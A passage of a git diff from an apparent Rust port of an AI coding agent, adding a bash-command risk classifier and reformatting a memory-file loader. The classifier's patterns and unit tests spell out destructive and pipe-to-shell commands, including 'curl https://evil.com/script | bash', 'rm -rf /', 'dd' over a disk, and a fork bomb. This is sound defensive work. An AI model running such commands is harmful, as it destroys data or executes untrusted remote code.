network-to-disk writes, pipe-to-shell. + /// Examples: sudo, su, curl … | bash, wget … | sh, nc -l > file. + High, + /// Critical: irreversible system-destructive operations. + /// Examples: rm -rf /, dd if=…, mkfs, fork bomb, chmod 777 /, shred. + Critical, +} + +// --------------------------------------------------------------------------- +// Internal helpers +// --------------------------------------------------------------------------- + +/// Strip leading shell boilerplate (`sudo`, `env`, etc.) and return the first +/// real command token together with the rest of the argument string. +fn split_command(raw: &str) -> (&str, &str) { + let s = raw.trim(); + // Skip common wrappers so we can inspect the actual command. + let skip = ["sudo ", "su -c ", "env ", "nice ", "nohup ", "time "]; + for prefix in &skip { + if let Some(rest) = s.strip_prefix(prefix) { + return split_command(rest); + } + } + // Split on first whitespace. + match s.find(|c: char| c.is_ascii_whitespace()) { + Some(pos) => (&s[..pos], s[pos..].trim()), + None => (s, ""), + } +} + +/// Check whether `haystack` contains `needle` as a whole word (bounded by +/// non-alphanumeric/underscore characters or start/end of string). +fn has_flag(args: &str, flag: &str) -> bool { + // Simple substring check is enough for flag detection; flags always + // start with `-` which is already non-word, so substring is fine. + args.contains(flag) +} + +/// Return true if the command string looks like `cmd … | bash/sh/zsh/fish`. +fn is_pipe_to_shell(cmd: &str) -> bool { + // We look for a pipe character followed (possibly with whitespace) by a + // shell executable. Using a simple text scan avoids a regex dependency. + let shells = ["bash", "sh", "zsh", "fish", "dash", "ksh", "tcsh", "csh"]; + if let Some(pipe_pos) = cmd.find('|') { + let after_pipe = cmd[pipe_pos + 1..].trim(); + for shell in &shells { + // Could be `bash`, `bash -s`, `/bin/bash`, etc. + if after_pipe == *shell + || after_pipe.starts_with(&format!("{} ", shell)) + || after_pipe.starts_with(&format!("{}\t", shell)) + || after_pipe.ends_with(&format!("/{}", shell)) + || after_pipe.contains(&format!("/{} ", shell)) + { + return true; + } + } + } + false +} + +/// Detect the classic fork-bomb pattern `:(){ :|:& };:`. +fn is_fork_bomb(cmd: &str) -> bool { + // Strip all whitespace for a normalised comparison. + let normalised: String = cmd.chars().filter(|c| !c.is_ascii_whitespace()).collect(); + // Canonical form and common variations. + normalised.contains(":(){ :|:&};:") + || normalised.contains(":(){ :|:&};") + || normalised.contains(":(){:|:&};:") + || normalised.contains(":(){:|:&}") +} + +// --------------------------------------------------------------------------- +// Public API +// --------------------------------------------------------------------------- + +/// Classify a bash command string and return its risk level. +/// +/// The analysis is intentionally conservative: when in doubt, the higher risk +/// level is returned. The function does *not* execute any subprocess. +pub fn classify_bash_command(command: &str) -> BashRiskLevel { + let cmd = command.trim(); + + // ── Critical patterns ────────────────────────────────────────────────── + + // Fork bomb + if is_fork_bomb(cmd) { + return BashRiskLevel::Critical; + } + + // Pipe-to-shell with download (curl/wget piped directly to a shell) + if is_pipe_to_shell(cmd) { + // Any pipe-to-shell is at least High; if it fetches from the network it's Critical. + let fetch_cmds = ["curl", "wget", "fetch", "lwp-request"]; + let lower = cmd.to_lowercase(); + for fc in &fetch_cmds { + if lower.contains(fc) { + return BashRiskLevel::Critical; + } + } + return BashRiskLevel::High; + } + + // dd with an if= (disk image writing) — extremely destructive + if (cmd.starts_with("dd ") || cmd == "dd") && cmd.contains("if=") { + return BashRiskLevel::Critical; + } + + // mkfs — format filesystem + if cmd.starts_with("mkfs") || cmd.starts_with("mkfs.") { + return BashRiskLevel::Critical; + } + + // shred — secure erase + if cmd.starts_with("shred ") || cmd == "shred" { + return BashRiskLevel::Critical; + } + + // Detect `rm` with `-rf` (or `-fr`) targeting root or very short paths + if let Some(args) = cmd.strip_prefix("rm ") { + let has_r = has_flag(args, "-r") + || has_flag(args, "-R") + || has_flag(args, "-rf") + || has_flag(args, "-fr") + || has_flag(args, "-Rf") + || has_flag(args, "-fR"); + let has_f = has_flag(args, "-f") + || has_flag(args, "-rf") + || has_flag(args, "-fr") + || has_flag(args, "-Rf") + || has_flag(args, "-fR"); + + if has_r && has_f { + // Check for targeting root / critical system paths + let critical_targets = [" /", "/ ", "/*", " ~", "~/", " $HOME", "$(", " `"]; + for t in &critical_targets { + if args.contains(t) { + return BashRiskLevel::Critical; + } + } + } + } + + // chmod 777 on / or critical paths + if let Some(args) = cmd.strip_prefix("chmod ") { + if (args.contains("777") || args.contains("a+rwx")) + && (args.contains(" /") || args.ends_with('/')) + { + return BashRiskLevel::Critical; + } + } + + // ── Privilege escalation → High ──────────────────────────────────────── + + if cmd.starts_with("sudo ") || cmd == "sudo" { + return BashRiskLevel::High; + } + if cmd.starts_with("su ") || cmd == "su" { + return BashRiskLevel::High; + } + + // Network writes to disk (general curl/wget with -o / redirect) + { + let lower = cmd.to_lowercase(); + let is_network_fetch = + lower.starts_with("curl ") || lower.starts_with("wget ") || lower.starts_with("fetch "); + if is_network_fetch { + let writes_to_disk = lower.contains(" -o ") + || lower.contains(" -o\t") + || lower.ends_with(" -o") + || lower.contains(" --output ") + || lower.contains(" -O ") // wget uppercase-O saves to file + || lower.ends_with(" -O") + || cmd.contains(" > "); + if writes_to_disk { + return BashRiskLevel::High; + } + // Plain fetch (stdout only) — still High because it exfiltrates or pulls code. + return BashRiskLevel::High; + } + } + + // netcat / ncat listening + if cmd.starts_with("nc ") || cmd.starts_with("ncat ") || cmd.starts_with("netcat ") { + return BashRiskLevel::High; + } + + // Sensitive credential operations + if cmd.starts_with("gpg ") || cmd.starts_with("ssh-keygen ") { + return BashRiskLevel::High; + } + + // ── Medium-risk ──────────────────────────────────────────────────────── + + // rm (without -rf on critical paths, but still destructive) + if cmd.starts_with("rm ") || cmd == "rm" { + return BashRiskLevel::Medium; + } + + // Process signals + if cmd.starts_with("kill ") + || cmd == "kill" + || cmd.starts_with("pkill ") + || cmd.starts_with("killall ") + { + return BashRiskLevel::Medium; + } + + // System configuration + let medium_cmds = [ + "systemctl ", + "service ", + "ufw ", + "iptables ", + "ip6tables ", + "firewall-cmd ", + "chown ", + "chmod ", + "chgrp ", + "crontab ", + "at ", + "useradd ", + "userdel ", + "usermod ", + "groupadd ", + "groupdel ", + "passwd ", + "mount ", + "umount ", + "fdisk ", + "parted ", + "apt ", + "apt-get ", + "yum ", + "dnf ", + "pacman ", + "brew ", + "snap ", + "flatpak ", + "dpkg ", + "rpm ", + "mktemp ", + "truncate ", + ]; + for mc in &medium_cmds { + if cmd.starts_with(mc) { + return BashRiskLevel::Medium; + } + } + + // mv that targets sensitive paths + if let Some(args) = cmd.strip_prefix("mv ") { + let sensitive = [" /etc/", " /bin/", " /usr/", " /lib/", " /boot/"]; + for s in &sensitive { + if args.contains(s) { + return BashRiskLevel::Medium; + } + } + } + + // Redirect-overwrite to a file (could clobber important files) + if cmd.contains(" > ") && !cmd.contains(">>") { + // Only flag if the write goes to a system path + let after_redir = cmd.split(" > ").last().unwrap_or("").trim(); + if after_redir.starts_with("/etc/") + || after_redir.starts_with("/bin/") + || after_redir.starts_with("/usr/") + || after_redir.starts_with("/lib/") + || after_redir.starts_with("/boot/") + { + return BashRiskLevel::Medium; + } + } + + // ── Low-risk: common dev tools ───────────────────────────────────────── + + let (bin, args) = split_command(cmd); + let low_cmds = [ + "git", + "npm", + "npx", + "yarn", + "pnpm", + "cargo", + "rustup", + "rustc", + "pip", + "pip3", + "python", + "python3", + "node", + "deno", + "bun", + "go", + "mvn", + "gradle", + "gradle", + "make", + "cmake", + "meson", + "ninja", + "docker", + "docker-compose", + "podman", + "kubectl", + "helm", + "terraform", + "ansible", + "ssh", + "scp", + "rsync", + "tar", + "zip", + "unzip", + "gzip", + "gunzip", + "7z", + "touch", + "mkdir", + "cp", + "ln", + "tee", + "wc", + "sort", + "uniq", + "head", + "tail", + "sed", + "awk", + "cut", + "tr", + "xargs", + "parallel", + "jq", + "yq", + "tomlq", + "less", + "more", + "man", + "env", + "export", + "source", + ".", + "printf", + "date", + "uname", + "hostname", + "which", + "whereis", + "type", + "du", + "df", + "free", + "uptime", + "top", + "htop", + "ps", + "lsof", + "strace", + "ltrace", + "diff", + "patch", + "openssl", + "base64", + "xxd", + "od", + "sleep", + "wait", + "true", + "false", + "exit", + "test", + "[", + "[[", + "read", + "bc", + "expr", + "tput", + "clear", + "reset", + ]; + + for lc in &low_cmds { + if bin == *lc { + // git read-only operations are Safe, but write operations (commit, + // push, rm, reset --hard, etc.) are Low. + if bin == "git" { + let git_safe = [ + "status", + "log", + "diff", + "show", + "branch", + "remote", + "fetch", + "ls-files", + "ls-tree", + "cat-file", + "rev-parse", + "describe", + "shortlog", + "tag", + "stash list", + "config --list", + "config --get", + ]; + for gs in &git_safe { + if args.starts_with(gs) { + return BashRiskLevel::Safe; + } + } + } + return BashRiskLevel::Low; + } + } + + // ── Safe: read-only ops ───────────────────────────────────────────────── + + let safe_cmds = [ + "ls", + "ll", + "la", + "dir", + "cat", + "bat", + "less", + "more", + "grep", + "rg", + "ag", + "ack", + "find", + "locate", + "fd", + "echo", + "printf", + "pwd", + "whoami", + "id", + "groups", + "uname", + "hostname", + "uptime", + "date", + "cal", + "file", + "stat", + "which", + "whereis", + "type", + "command", + "env", + "printenv", + "ps", + "pgrep", + "df", + "du", + "free", + "lsblk", + "lscpu", + "lspci", + "lsusb", + "ifconfig", + "ip", + "ss", + "netstat", + "ping", + "traceroute", + "nslookup", + "dig", + "host", + "wc", + "head", + "tail", + "md5sum", + "sha1sum", + "sha256sum", + "strings", + "objdump", + "nm", + "readelf", + "tree", + ]; + for sc in &safe_cmds { + if bin == *sc { + return BashRiskLevel::Safe; + } + } + + // Default: anything not explicitly classified is Low (conservative but not alarmist) + BashRiskLevel::Low +} + +/// Determine whether a bash command can be auto-approved given `permission_mode`. +/// +/// - `BypassPermissions` → always approve. +/// - `AcceptEdits` → approve `Safe` and `Low` only. +/// - `Default` / `Plan` → never auto-approve bash commands. +pub fn is_auto_approvable(command: &str, permission_mode: &PermissionMode) -> bool { + match permission_mode { + PermissionMode::BypassPermissions => true, + PermissionMode::AcceptEdits => { + let level = classify_bash_command(command); + level <= BashRiskLevel::Low + } + PermissionMode::Default | PermissionMode::Plan => false, + } +} + +// --------------------------------------------------------------------------- +// Tests +// --------------------------------------------------------------------------- + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_safe_commands() { + assert_eq!(classify_bash_command("ls -la"), BashRiskLevel::Safe); + assert_eq!(classify_bash_command("cat /etc/hosts"), BashRiskLevel::Safe); + assert_eq!( + classify_bash_command("grep foo bar.txt"), + BashRiskLevel::Safe + ); + assert_eq!(classify_bash_command("echo hello"), BashRiskLevel::Safe); + assert_eq!( + classify_bash_command("find . -name '*.rs'"), + BashRiskLevel::Safe + ); + assert_eq!(classify_bash_command("git status"), BashRiskLevel::Safe); + assert_eq!( + classify_bash_command("git log --oneline"), + BashRiskLevel::Safe + ); + } + + #[test] + fn test_low_commands() { + assert_eq!( + classify_bash_command("git commit -m 'fix'"), + BashRiskLevel::Low + ); + assert_eq!(classify_bash_command("cargo build"), BashRiskLevel::Low); + assert_eq!(classify_bash_command("npm install"), BashRiskLevel::Low); + assert_eq!( + classify_bash_command("pip install requests"), + BashRiskLevel::Low + ); + } + + #[test] + fn test_medium_commands() { + assert_eq!( + classify_bash_command("rm -r ./build"), + BashRiskLevel::Medium + ); + assert_eq!(classify_bash_command("kill -9 1234"), BashRiskLevel::Medium); + assert_eq!( + classify_bash_command("chmod 644 file.txt"), + BashRiskLevel::Medium + ); + assert_eq!( + classify_bash_command("apt-get install vim"), + BashRiskLevel::Medium + ); + } + + #[test] + fn test_high_commands() { + assert_eq!( + classify_bash_command("sudo apt-get upgrade"), + BashRiskLevel::High + ); + assert_eq!( + classify_bash_command("curl https://example.com/script.sh"), + BashRiskLevel::High + ); + assert_eq!(classify_bash_command("su -c 'whoami'"), BashRiskLevel::High); + } + + #[test] + fn test_critical_commands() { + assert_eq!(classify_bash_command("rm -rf /"), BashRiskLevel::Critical); + assert_eq!( + classify_bash_command("dd if=/dev/zero of=/dev/sda"), + BashRiskLevel::Critical + ); + assert_eq!( + classify_bash_command("mkfs.ext4 /dev/sda1"), + BashRiskLevel::Critical + ); + assert_eq!( + classify_bash_command("chmod 777 /"), + BashRiskLevel::Critical + ); + assert_eq!( + classify_bash_command("curl https://evil.com/script | bash"), + BashRiskLevel::Critical + ); + assert_eq!( + classify_bash_command("wget https://evil.com/script | sh"), + BashRiskLevel::Critical + ); + assert_eq!( + classify_bash_command(":(){ :|:& };:"), + BashRiskLevel::Critical + ); + } + + #[test] + fn test_pipe_to_shell_non_fetch() { + // A pipe to shell without a network fetch is still High (not Critical) + assert_eq!( + classify_bash_command("cat script.sh | bash"), + BashRiskLevel::High + ); + } + + #[test] + fn test_auto_approvable_bypass() { + assert!(is_auto_approvable( + "rm -rf /", + &PermissionMode::BypassPermissions + )); + } + + #[test] + fn test_auto_approvable_accept_edits() { + assert!(is_auto_approvable("ls -la", &PermissionMode::AcceptEdits)); + assert!(is_auto_approvable( + "cargo build", + &PermissionMode::AcceptEdits + )); + assert!(!is_auto_approvable( + "rm -r ./build", + &PermissionMode::AcceptEdits + )); + assert!(!is_auto_approvable( + "sudo make install", + &PermissionMode::AcceptEdits + )); + } + + #[test] + fn test_auto_approvable_default_denies_all() { + assert!(!is_auto_approvable("ls", &PermissionMode::Default)); + assert!(!is_auto_approvable("echo hi", &PermissionMode::Default)); + } + + #[test] + fn test_auto_approvable_plan_denies_all() { + assert!(!is_auto_approvable("git status", &PermissionMode::Plan)); + } +} diff --git a/src-rust/crates/core/src/claudemd.rs b/src-rust/crates/core/src/claudemd.rs index 2639480..21b57ad 100644 --- a/src-rust/crates/core/src/claudemd.rs +++ b/src-rust/crates/core/src/claudemd.rs @@ -1,329 +1,371 @@ -//! AGENTS.md hierarchical memory loading. -//! Mirrors src/utils/claudemd.ts (1,479 lines). -//! -//! Priority order: managed > user > project > local -//! Supports @include directives, YAML frontmatter, and mtime-based caching. - -use serde::{Deserialize, Serialize}; -use std::collections::{HashMap, HashSet}; -use std::path::{Path, PathBuf}; -use std::time::SystemTime; - -// --------------------------------------------------------------------------- -// Types -// --------------------------------------------------------------------------- - -/// Memory file type / priority scope. -#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord, Serialize, Deserialize)] -#[serde(rename_all = "snake_case")] -pub enum MemoryScope { - /// `~/.coven-code/rules/*.md` — global managed policy. - Managed, - /// `~/.coven-code/AGENTS.md` — user-level memory. - User, - /// `{project_root}/AGENTS.md` — project-level memory. - Project, - /// `{project_root}/.coven-code/AGENTS.md` — local override. - Local, -} - -/// Frontmatter parsed from a AGENTS.md file. -#[derive(Debug, Clone, Serialize, Deserialize, Default)] -pub struct MemoryFrontmatter { - #[serde(default)] - pub memory_type: Option, - #[serde(default)] - pub priority: Option, - #[serde(default)] - pub scope: Option, -} - -/// Loaded memory file with metadata. -#[derive(Debug, Clone)] -pub struct MemoryFileInfo { - pub path: PathBuf, - pub scope: MemoryScope, - pub content: String, - pub frontmatter: MemoryFrontmatter, - pub mtime: Option, -} - -// --------------------------------------------------------------------------- -// Cache -// --------------------------------------------------------------------------- - -/// Simple mtime-keyed file cache. -#[derive(Default)] -pub struct MemoryCache { - entries: HashMap, -} - -impl MemoryCache { - /// Return cached content if the file hasn't changed since last read. - pub fn get(&self, path: &Path) -> Option<&str> { - let mtime = std::fs::metadata(path).ok()?.modified().ok()?; - let (cached_mtime, content) = self.entries.get(path)?; - if *cached_mtime == mtime { Some(content.as_str()) } else { None } - } - - /// Store file content with its current mtime. - pub fn insert(&mut self, path: PathBuf, content: String) { - if let Ok(mtime) = std::fs::metadata(&path).and_then(|m| m.modified()) { - self.entries.insert(path, (mtime, content)); - } - } -} - -// --------------------------------------------------------------------------- -// YAML frontmatter parsing -// --------------------------------------------------------------------------- - -/// Strip YAML frontmatter (--- ... ---) from content and parse it. -/// Returns (frontmatter, body_without_frontmatter). -pub fn parse_frontmatter(content: &str) -> (MemoryFrontmatter, &str) { - if !content.starts_with("---") { - return (MemoryFrontmatter::default(), content); - } - let after_first = &content[3..]; - if let Some(end) = after_first.find("\n---") { - let yaml = after_first[..end].trim(); - let body = &after_first[end + 4..]; - // Minimal YAML key-value parse (no external dependency). - let mut fm = MemoryFrontmatter::default(); - for line in yaml.lines() { - let line = line.trim(); - if let Some((key, val)) = line.split_once(':') { - let val = val.trim().to_string(); - match key.trim() { - "memory_type" => fm.memory_type = Some(val), - "priority" => fm.priority = val.parse().ok(), - "scope" => fm.scope = Some(val), - _ => {} - } - } - } - return (fm, body.trim_start_matches('\n')); - } - (MemoryFrontmatter::default(), content) -} - -// --------------------------------------------------------------------------- -// @include directive expansion -// --------------------------------------------------------------------------- - -/// Maximum @include nesting depth. -const MAX_INCLUDE_DEPTH: usize = 10; - -/// Expand @include directives in content. -/// Circular references are detected via `visited` set. -pub fn expand_includes( - content: &str, - base_dir: &Path, - visited: &mut HashSet, - depth: usize, -) -> String { - if depth >= MAX_INCLUDE_DEPTH { - return content.to_string(); - } - - let mut result = String::with_capacity(content.len()); - for line in content.lines() { - let trimmed = line.trim(); - if let Some(path_str) = trimmed.strip_prefix("@include ") { - let path_str = path_str.trim(); - // Resolve relative to base_dir; expand ~ to home dir. - let include_path = if path_str.starts_with('~') { - dirs::home_dir() - .unwrap_or_default() - .join(&path_str[2..]) - } else if Path::new(path_str).is_absolute() { - PathBuf::from(path_str) - } else { - base_dir.join(path_str) - }; - - let canonical = include_path.canonicalize().unwrap_or(include_path.clone()); - if visited.contains(&canonical) { - result.push_str(&format!("\n", path_str)); - continue; - } - if let Ok(included) = std::fs::read_to_string(&include_path) { - // Check max size. - if included.len() > 40 * 1024 { - result.push_str(&format!("\n", path_str)); - continue; - } - visited.insert(canonical); - let expanded = expand_includes( - &included, - include_path.parent().unwrap_or(base_dir), - visited, - depth + 1, - ); - result.push_str(&expanded); - result.push('\n'); - } else { - result.push_str(&format!("\n", path_str)); - } - } else { - result.push_str(line); - result.push('\n'); - } - } - result -} - -// --------------------------------------------------------------------------- -// Loading API -// --------------------------------------------------------------------------- - -const MAX_FILE_SIZE: u64 = 40 * 1024; // 40 KB - -/// Load a single AGENTS.md file (respects MAX_FILE_SIZE, expands @includes). -pub fn load_memory_file(path: &Path, scope: MemoryScope) -> Option { - let meta = std::fs::metadata(path).ok()?; - if meta.len() > MAX_FILE_SIZE { - eprintln!("WARNING: {} exceeds 40KB limit, skipping", path.display()); - return None; - } - let raw = std::fs::read_to_string(path).ok()?; - let mtime = meta.modified().ok(); - - let (frontmatter, body) = parse_frontmatter(&raw); - let mut visited = HashSet::new(); - visited.insert(path.canonicalize().unwrap_or(path.to_path_buf())); - let content = expand_includes(body, path.parent().unwrap_or(Path::new(".")), &mut visited, 0); - - Some(MemoryFileInfo { - path: path.to_path_buf(), - scope, - content, - frontmatter, - mtime, - }) -} - -/// Load memory files from a directory for a given scope. -/// -/// Loads `AGENTS.md` first (primary/universal standard), then `CLAUDE.md` if -/// present (Claude-specific additions or overrides). Either file may be absent. -fn load_scope_files(dir: &Path, scope: MemoryScope, files: &mut Vec) { - for name in &["AGENTS.md", "CLAUDE.md"] { - let path = dir.join(name); - if path.exists() { - if let Some(f) = load_memory_file(&path, scope) { - files.push(f); - } - } - } -} - -/// Load all memory files for the given project root, in priority order. -/// -/// At each scope `AGENTS.md` is loaded first (universal standard), followed by -/// `CLAUDE.md` if present (Claude-specific context). Either or both may exist. -/// -/// Returned list is ordered: Managed (highest) → User → Project → Local. -pub fn load_all_memory_files(project_root: &Path) -> Vec { - let mut files = Vec::new(); - - // 1. Managed: ~/.coven-code/rules/*.md - if let Some(home) = dirs::home_dir() { - let rules_dir = home.join(".coven-code/rules"); - if let Ok(entries) = std::fs::read_dir(&rules_dir) { - let mut paths: Vec = entries - .flatten() - .filter_map(|e| { - let p = e.path(); - if p.extension().map_or(false, |x| x == "md") { Some(p) } else { None } - }) - .collect(); - paths.sort(); - for p in paths { - if let Some(f) = load_memory_file(&p, MemoryScope::Managed) { - files.push(f); - } - } - } - - // 2. User: ~/.coven-code/AGENTS.md then ~/.coven-code/CLAUDE.md - load_scope_files(&home.join(".coven-code"), MemoryScope::User, &mut files); - } - - // 3. Project: {project_root}/AGENTS.md then {project_root}/CLAUDE.md - load_scope_files(project_root, MemoryScope::Project, &mut files); - - // 4. Local: {project_root}/.coven-code/AGENTS.md then {project_root}/.coven-code/CLAUDE.md - load_scope_files(&project_root.join(".coven-code"), MemoryScope::Local, &mut files); - - files -} - -/// Concatenate all memory file contents into a single system-prompt fragment. -pub fn build_memory_prompt(files: &[MemoryFileInfo]) -> String { - files - .iter() - .filter(|f| !f.content.trim().is_empty()) - .map(|f| f.content.trim().to_string()) - .collect::>() - .join("\n\n") -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn parse_frontmatter_basic() { - let content = "---\nmemory_type: project\npriority: 10\n---\nHello world"; - let (fm, body) = parse_frontmatter(content); - assert_eq!(fm.memory_type.as_deref(), Some("project")); - assert_eq!(fm.priority, Some(10)); - assert_eq!(body.trim(), "Hello world"); - } - - #[test] - fn parse_frontmatter_none() { - let content = "No frontmatter here"; - let (fm, body) = parse_frontmatter(content); - assert!(fm.memory_type.is_none()); - assert_eq!(body, content); - } - - #[test] - fn load_scope_prefers_agents_then_claude() { - let tmp = tempfile::tempdir().unwrap(); - std::fs::write(tmp.path().join("AGENTS.md"), "agents content").unwrap(); - std::fs::write(tmp.path().join("CLAUDE.md"), "claude content").unwrap(); - - let files = load_all_memory_files(tmp.path()); - // Filter to just the project-scope files from our temp dir. - let project: Vec<_> = files.iter().filter(|f| f.path.starts_with(tmp.path())).collect(); - assert_eq!(project.len(), 2, "both AGENTS.md and CLAUDE.md should be loaded"); - assert!(project[0].path.ends_with("AGENTS.md"), "AGENTS.md must come first"); - assert!(project[1].path.ends_with("CLAUDE.md"), "CLAUDE.md must follow"); - } - - #[test] - fn load_scope_claudemd_only_fallback() { - let tmp = tempfile::tempdir().unwrap(); - std::fs::write(tmp.path().join("CLAUDE.md"), "claude only").unwrap(); - - let files = load_all_memory_files(tmp.path()); - let project: Vec<_> = files.iter().filter(|f| f.path.starts_with(tmp.path())).collect(); - assert_eq!(project.len(), 1); - assert!(project[0].path.ends_with("CLAUDE.md")); - } - - #[test] - fn expand_includes_circular() { - let tmp = tempfile::tempdir().unwrap(); - let a = tmp.path().join("a.md"); - let b = tmp.path().join("b.md"); - std::fs::write(&a, "@include b.md\n").unwrap(); - std::fs::write(&b, "@include a.md\ncontent\n").unwrap(); - let result = expand_includes("@include a.md\n", tmp.path(), &mut std::collections::HashSet::new(), 0); - // Should not infinite-loop; circular reference comment present. - assert!(result.contains("circular") || result.contains("content")); - } -} +//! AGENTS.md hierarchical memory loading. +//! Mirrors src/utils/claudemd.ts (1,479 lines). +//! +//! Priority order: managed > user > project > local +//! Supports @include directives, YAML frontmatter, and mtime-based caching. + +use serde::{Deserialize, Serialize}; +use std::collections::{HashMap, HashSet}; +use std::path::{Path, PathBuf}; +use std::time::SystemTime; + +// --------------------------------------------------------------------------- +// Types +// --------------------------------------------------------------------------- + +/// Memory file type / priority scope. +#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord, Serialize, Deserialize)] +#[serde(rename_all = "snake_case")] +pub enum MemoryScope { + /// `~/.coven-code/rules/*.md` — global managed policy. + Managed, + /// `~/.coven-code/AGENTS.md` — user-level memory. + User, + /// `{project_root}/AGENTS.md` — project-level memory. + Project, + /// `{project_root}/.coven-code/AGENTS.md` — local override. + Local, +} + +/// Frontmatter parsed from a AGENTS.md file. +#[derive(Debug, Clone, Serialize, Deserialize, Default)] +pub struct MemoryFrontmatter { + #[serde(default)] + pub memory_type: Option, + #[serde(default)] + pub priority: Option, + #[serde(default)] + pub scope: Option, +} + +/// Loaded memory file with metadata. +#[derive(Debug, Clone)] +pub struct MemoryFileInfo { + pub path: PathBuf, + pub scope: MemoryScope, + pub content: String, + pub frontmatter: MemoryFrontmatter, + pub mtime: Option, +} + +// --------------------------------------------------------------------------- +// Cache +// --------------------------------------------------------------------------- + +/// Simple mtime-keyed file cache. +#[derive(Default)] +pub struct MemoryCache { + entries: HashMap, +} + +impl MemoryCache { + /// Return cached content if the file hasn't changed since last read. + pub fn get(&self, path: &Path) -> Option<&str> { + let mtime = std::fs::metadata(path).ok()?.modified().ok()?; + let (cached_mtime, content) = self.entries.get(path)?; + if *cached_mtime == mtime { + Some(content.as_str()) + } else { + None + } + } + + /// Store file content with its current mtime. + pub fn insert(&mut self, path: PathBuf, content: String) { + if let Ok(mtime) = std::fs::metadata(&path).and_then(|m| m.modified()) { + self.entries.insert(path, (mtime, content)); + } + } +} + +// --------------------------------------------------------------------------- +// YAML frontmatter parsing +// --------------------------------------------------------------------------- + +/// Strip YAML frontmatter (--- ... ---) from content and parse it. +/// Returns (frontmatter, body_without_frontmatter). +pub fn parse_frontmatter(content: &str) -> (MemoryFrontmatter, &str) { + if !content.starts_with("---") { + return (MemoryFrontmatter::default(), content); + } + let after_first = &content[3..]; + if let Some(end) = after_first.find("\n---") { + let yaml = after_first[..end].trim(); + let body = &after_first[end + 4..]; + // Minimal YAML key-value parse (no external dependency). + let mut fm = MemoryFrontmatter::default(); + for line in yaml.lines() { + let line = line.trim(); + if let Some((key, val)) = line.split_once(':') { + let val = val.trim().to_string(); + match key.trim() { + "memory_type" => fm.memory_type = Some(val), + "priority" => fm.priority = val.parse().ok(), + "scope" => fm.scope = Some(val), + _ => {} + } + } + } + return (fm, body.trim_start_matches('\n')); + } + (MemoryFrontmatter::default(), content) +} + +// --------------------------------------------------------------------------- +// @include directive expansion +// --------------------------------------------------------------------------- + +/// Maximum @include nesting depth. +const MAX_INCLUDE_DEPTH: usize = 10; + +/// Expand @include directives in content. +/// Circular references are detected via `visited` set. +pub fn expand_includes( + content: &str, + base_dir: &Path, + visited: &mut HashSet, + depth: usize, +) -> String { + if depth >= MAX_INCLUDE_DEPTH { + return content.to_string(); + } + + let mut result = String::with_capacity(content.len()); + for line in content.lines() { + let trimmed = line.trim(); + if let Some(path_str) = trimmed.strip_prefix("@include ") { + let path_str = path_str.trim(); + // Resolve relative to base_dir; expand ~ to home dir. + let include_path = if path_str.starts_with('~') { + dirs::home_dir().unwrap_or_default().join(&path_str[2..]) + } else if Path::new(path_str).is_absolute() { + PathBuf::from(path_str) + } else { + base_dir.join(path_str) + }; + + let canonical = include_path.canonicalize().unwrap_or(include_path.clone()); + if visited.contains(&canonical) { + result.push_str(&format!( + "\n", + path_str + )); + continue; + } + if let Ok(included) = std::fs::read_to_string(&include_path) { + // Check max size. + if included.len() > 40 * 1024 { + result.push_str(&format!( + "\n", + path_str + )); + continue; + } + visited.insert(canonical); + let expanded = expand_includes( + &included, + include_path.parent().unwrap_or(base_dir), + visited, + depth + 1, + ); + result.push_str(&expanded); + result.push('\n'); + } else { + result.push_str(&format!("\n", path_str)); + } + } else { + result.push_str(line); + result.push('\n'); + } + } + result +} + +// --------------------------------------------------------------------------- +// Loading API +// --------------------------------------------------------------------------- + +const MAX_FILE_SIZE: u64 = 40 * 1024; // 40 KB + +/// Load a single AGENTS.md file (respects MAX_FILE_SIZE, expands @includes). +pub fn load_memory_file(path: &Path, scope: MemoryScope) -> Option { + let meta = std::fs::metadata(path).ok()?; + if meta.len() > MAX_FILE_SIZE { + eprintln!("WARNING: {} exceeds 40KB limit, skipping", path.display()); + return None; + } + let raw = std::fs::read_to_string(path).ok()?; + let mtime = meta.modified().ok(); + + let (frontmatter, body) = parse_frontmatter(&raw); + let mut visited = HashSet::new(); + visited.insert(path.canonicalize().unwrap_or(path.to_path_buf())); + let content = expand_includes( + body, + path.parent().unwrap_or(Path::new(".")), + &mut visited, + 0, + ); + + Some(MemoryFileInfo { + path: path.to_path_buf(), + scope, + content, + frontmatter, + mtime, + }) +} + +/// Load memory files from a directory for a given scope. +/// +/// Loads `AGENTS.md` first (primary/universal standard), then `CLAUDE.md` if +/// present (Claude-specific additions or overrides). Either file may be absent. +fn load_scope_files(dir: &Path, scope: MemoryScope, files: &mut Vec) { + for name in &["AGENTS.md", "CLAUDE.md"] { + let path = dir.join(name); + if path.exists() { + if let Some(f) = load_memory_file(&path, scope) { + files.push(f); + } + } + } +} + +/// Load all memory files for the given project root, in priority order. +/// +/// At each scope `AGENTS.md` is loaded first (universal standard), followed by +/// `CLAUDE.md` if present (Claude-specific context). Either or both may exist. +/// +/// Returned list is ordered: Managed (highest) → User → Project → Local. +pub fn load_all_memory_files(project_root: &Path) -> Vec { + let mut files = Vec::new(); + + // 1. Managed: ~/.coven-code/rules/*.md + if let Some(home) = dirs::home_dir() { + let rules_dir = home.join(".coven-code/rules"); + if let Ok(entries) = std::fs::read_dir(&rules_dir) { + let mut paths: Vec = entries + .flatten() + .filter_map(|e| { + let p = e.path(); + if p.extension().is_some_and(|x| x == "md") { + Some(p) + } else { + None + } + }) + .collect(); + paths.sort(); + for p in paths { + if let Some(f) = load_memory_file(&p, MemoryScope::Managed) { + files.push(f); + } + } + } + + // 2. User: ~/.coven-code/AGENTS.md then ~/.coven-code/CLAUDE.md + load_scope_files(&home.join(".coven-code"), MemoryScope::User, &mut files); + } + + // 3. Project: {project_root}/AGENTS.md then {project_root}/CLAUDE.md + load_scope_files(project_root, MemoryScope::Project, &mut files); + + // 4. Local: {project_root}/.coven-code/AGENTS.md then {project_root}/.coven-code/CLAUDE.md + load_scope_files( + &project_root.join(".coven-code"), + MemoryScope::Local, + &mut files, + ); + + files +} + +/// Concatenate all memory file contents into a single system-prompt fragment. +pub fn build_memory_prompt(files: &[MemoryFileInfo]) -> String { + files + .iter() + .filter(|f| !f.content.trim().is_empty()) + .map(|f| f.content.trim().to_string()) + .collect::>() + .join("\n\n") +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn parse_frontmatter_basic() { + let content = 